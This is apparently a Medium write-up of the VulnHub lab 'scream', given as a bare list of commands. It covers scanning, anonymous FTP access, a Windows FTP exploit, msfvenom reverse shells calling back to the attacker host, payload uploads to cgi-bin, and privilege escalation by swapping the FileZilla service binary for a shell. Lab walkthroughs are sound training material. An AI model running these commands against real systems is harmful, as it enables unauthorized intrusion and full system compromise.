VulnHub: /dev/random: scream

nmap -sn 10.0.2.27/24
nmap -Pn 10.0.2.28nmap -Pn -p1000- 10.0.2.28
nmap -A -p21,22,23,80 10.0.2.28
nmap --script vuln -p21,22,23,80 10.0.2.28
ftp 10.0.2.28Name: anonymousPassword: (empty)
ls -laget bin
cd /binls -la
cd ../logls -la
cd ../rootls -la
cd cgi-binls -la
wine Orwell\ Dev\ C++_5.7.1_Soft32.exe
wine 3570.exe
wine 3570.exe 10.0.2.28 5
telnet 10.0.2.28 7777
wine 3570.exe 10.0.2.28 13
telnet 10.0.2.28 7777
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows
rlwrap nc -lvp 443
python warftp-ftp.py
ssh 10.0.2.28
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc   10.0.2.28
msfconsolesearch fresshd
use 2show options
set RHOST 10.0.2.28set LHOST 10.0.2.27set LPORT 443run -j
telnet 10.0.2.28 23
nikto -h http://10.0.2.28
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.28/ -x php,txt,html,sh,cgi,bak -q
nmap -sU -sV 10.0.2.28 -vvvv
mode binaryput test.txt root/cgi-bin -> failedput test.txt /cgi-bin -> failedput test.txt cgi-bin/ -> failedput test.txt cgi-bin/test.txt -> succeeded
http://10.0.2.28/cgi-bin/test.txt
put helloworld.pl cgi-bin/helloworld.pl -> succeeded
rlwrap nc -lvp 443
put exploit.pl cgi-bin/exploit.pl
put exploit.pl cgi-bin/exploit2.pl
echo %username%
systeminfo
tasklist   /FI "username eq SYSTEM"
cd \dir
rlwrap nc -lvp 80
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=80 -e   x86/shikata_ga_nai -f exe > shell.exe
put shell.exe cgi-bin/shell.exe
dirshell.exe
dir "FileZilla server.exe" /s /b
net start
net stop "FileZilla Server FTP server"
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=80 -e   x86/shikata_ga_nai -f exe > shell2.exe
put shell2.exe cgi-bin/shell2.exe
rlwrap nc -lvp 21
cd \Program Files\FileZilla Server\dir
rename "FileZilla server.exe" "FileZilla server.exe.bak"dir
copy \www\root\cgi-bin\shell2.exe "FileZilla server.exe"dir
net start "FileZilla Server FTP server"

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store